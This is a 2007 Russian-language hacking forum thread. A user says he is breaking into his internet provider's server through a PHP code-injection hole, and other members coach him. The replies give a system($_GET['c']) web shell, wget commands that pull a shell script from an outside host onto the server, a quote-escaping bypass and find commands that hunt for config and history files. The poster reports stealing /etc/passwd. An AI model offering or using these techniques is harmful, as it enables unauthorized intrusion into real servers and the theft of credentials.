Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.03.2007, 01:47
|
|
Новичок
Регистрация: 15.01.2005
Сообщений: 4
Провел на форуме:
6561
Репутация:
0
|
|
Пшп инъекция
Имею 3 файла, admin.php, counter.dat, gor_news.php.
Админ пшп выглядит просто - 1 мемо и кнопка. То, что вводиться в мемо пишится в counter.dat. При заходе в gor_news.php загружаеться этот самый коунтер.дат. В админ.пшп можно вставлять пшп код, но код типа
<?php system('ls') ?>
в канутер.дат уже записываеться, как
<?php system(\'ls\') ?>
При вводе кода без кавычек получаю листинг файлов. Код типа
<?php system($cmd) ?>
выдает Warning: system() [function.system]: Cannot execute a blank command in /var/apache2/htdocs/rus/home/counter.dat on line 1
Думаю, проблема вам понятна) Как её можно обойти, и если обойти нельзя, можно ли прямым вводом команд получать листинг предыдущей папки? Выручайте, провайдера взламываю =)
Последний раз редактировалось FeeR; 28.03.2007 в 01:56..
|
|
|
28.03.2007, 02:05
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
хз чё посоветовать
попробуй wget'ом шелл залить
<? system(wget http://medved.ru/preved.php /var/apache2/htdocs/rus/home/preved.php) ?>
|
|
|
|
28.03.2007, 02:10
|
|
Новичок
Регистрация: 15.01.2005
Сообщений: 4
Провел на форуме:
6561
Репутация:
0
|
|
На вгет получил
Parse error: syntax error, unexpected T_STRING in /var/apache2/htdocs/rus/home/counter.dat on line 1
=)
Пробовал так:
<?php system(' ls '); ?>
Глупо, и не получилось =)
Напомните плз команды сервера, ls, cd и т.д., просмотр файла и всякое такое, давно не работал забыл уже ))
Последний раз редактировалось FeeR; 28.03.2007 в 02:12..
|
|
|
|
28.03.2007, 09:37
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Точно незнаю, но помойму эта хрень называется "magic quotes" и как то отключается на сервере
|
|
|
|
28.03.2007, 10:35
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
мдя..
<? system($_GET[c]); ?>
потом командуй
script.php?c=id
__________________
|
|
|
|
28.03.2007, 12:03
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
\x27 = '
|
|
|
|
28.03.2007, 12:27
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Сообщение от +toxa+
мдя..
<? system($_GET[c]); ?>
потом командуй
script.php?c=id
Тош))
Так правильнее будет -->>
PHP код:
<? system($_GET['c']); ?>
|
|
|
|
28.03.2007, 12:31
|
|
Новичок
Регистрация: 15.01.2005
Сообщений: 4
Провел на форуме:
6561
Репутация:
0
|
|
Так, спасибо тоха, я делал немного подругому) c как переменную объявлял и пшп тупил =) Есть доступ. Какие файлы в ../../../../../ могут пригодиться? =) etc\passwd слил.
|
|
|
|
28.03.2007, 13:45
|
|
Познающий
Регистрация: 11.01.2007
Сообщений: 82
Провел на форуме:
592893
Репутация:
108
|
|
Почти в любом шелле есть поиск всех *conf, suid программ и др...загрузи шелл командой wget http://yoursite/shell.php(шеллы тут ). Также можно посмотреть bash_history в домашних каталогах /home/*(они не объязательно могут быть там). |
|
|
|
29.03.2007, 02:13
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
просто командуй:
директории доступные для записи:
find / -type d -perm 0777 -ls
ищем файлы содержашие в названии "config":
find / -type f -name "*config*.php" -ls
*_history файлы:
find / -type f -name "*_history" -ls
и так далее... |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
